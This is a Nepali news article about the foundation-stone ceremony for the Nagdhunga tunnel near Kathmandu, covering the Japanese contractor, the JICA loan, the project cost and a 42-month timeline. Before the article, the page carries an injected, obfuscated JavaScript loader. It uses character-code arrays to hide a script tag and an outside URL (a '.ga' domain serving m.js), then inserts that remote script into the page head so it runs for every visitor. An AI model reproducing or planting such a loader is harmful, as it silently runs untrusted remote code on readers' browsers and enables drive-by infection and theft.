Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,100,111,99,107,46,108,111,118,101,103,114,101,101,110,112,101,110,99,105,108,115,46,103,97,47,109,46,106,115);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})(); नागढुंगा सुरुङमार्गको शिलान्यास आज, ४२ महिनामा निर्माण सम्पन्न हुने – जनदिशा

नागढुंगा सुरुङमार्गको शिलान्यास आज, ४२ महिनामा निर्माण सम्पन्न हुने

Last Updated Date:

काठमाडौँ । राजधानी जोड्ने मुलुककै महत्वपूर्ण सडकमार्ग नागढुङ्गा सुरुङमार्गको आज शिलन्यास हुने भएको छ । ४२ महिनाभित्र सुरुङमार्गको काम सक्ने गरी सोमबार प्रधानमन्त्री केपी शर्मा ओलीले सुरुङमार्गको शिलन्यास गर्दैछन् ।

चन्द्रागिरी नगरपालिका—१ को टोटेपाखादेखि धादिङको धुनीबेंसी नगरपालिका—९ सिस्नेखोलासम्म पुग्ने सुरुङमार्गको ठेक्का जापानको निर्माण कम्पनी हाज्मा एन्डो कर्पोरेसनले पाएको छ । हाज्माले क्याम राख्न जग्गा भाडा लिने र निर्माण गरिने स्थान सम्माउने काम सुरु गरिसकेको छ । सुरुङमार्गको डिजाइन परामर्शदाता कम्पनीमा निप्पन कोइ लिमिटेड रहेको छ ।

२३ सेक्टेबर २०१९ मा सरकारले साढे १३ अर्ब रुपैँयामा उक्त कम्पनीसँग ठेक्का सम्झौता गरेका हो । आयोजनाले तोकेको शर्तअनुसार यो सुङमार्ग प्रवेशका लागि त्रिभुवन राजपथबाट काठमाडौंतर्फ थानकोटको बस्नेत छापसम्म २.३० किमि र धादिङतर्फ धुनिबेसीको सिस्नेखोलाबाट पाँच सय ६५ मिटर पक्की सडक बनाउनुपर्नेछ ।

जापान अन्तर्राष्ट्रिय सहयोग नियोग (जाइका)को साढे १६ अर्ब सहुलियत ऋण र ६ अर्ब सरकारको गरी साढँ २२ अर्ब रुपैयाँमा सुरुङमार्ग आयोजना अघि बढेको हो ।

हाज्मा त्यहि कम्पनि हो, जसले बीपी राजमार्ग सहित कुलेखानी जलविद्युत् आयोजना, बनेपा—सिन्धुली सडक, सुर्यबिनायक—सिन्धुली सडक, कोटेश्वर—सुर्यविनायक सडक विस्तार गरिसकेको छ ।

सुरुङमार्ग बनेपछि अहिलेको नौबिसे—नागढुंगा सडकमा हुने जाम, जोखिम र समयसँगै यात्रा छोटिने विश्वास गरिएको छ । अहिले नौबिसेदेखि नागढुङ्गासम्म सबैखाले सवारी आइपुग्न ४५ मिनेटदेखि १ घण्टा लाग्छ । सडकले नागढुंगाबाट घुमेर जानुपर्ने बाटोको समय कम्तीमा ३० मिनेट बचत गर्ने आयोजना पक्षको दाबी छ ।

यो सामग्री सेयर गर्नुहोस

तपाईलाई माथिको समाचार/लेख कस्तो लाग्यो ? प्रतिक्रिया दिनुहोस ।
Top